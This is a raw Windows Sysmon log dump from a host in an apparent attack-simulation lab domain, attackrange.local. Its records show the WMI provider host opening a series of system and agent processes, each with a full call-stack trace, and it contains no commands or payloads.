Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.394{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 